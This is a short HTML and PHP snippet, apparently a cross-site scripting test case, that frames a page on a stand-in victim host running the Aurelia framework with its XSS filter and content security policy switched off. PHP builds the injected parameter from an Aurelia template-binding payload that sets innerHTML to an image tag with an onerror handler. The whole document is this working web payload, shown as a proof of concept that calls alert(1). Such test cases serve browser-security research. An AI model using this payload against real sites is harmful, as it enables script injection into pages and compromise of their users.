<iframe src="https://victim.example.com/repo/csp/sd/aurelia.php?xssfilter=1&csp=0&inj=<?php 
$payload = <<<'PAYLOAD'
<div ref=me 
innerhtml.bind="'<img src=x onerror=alert(1)>'" 
></div>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>

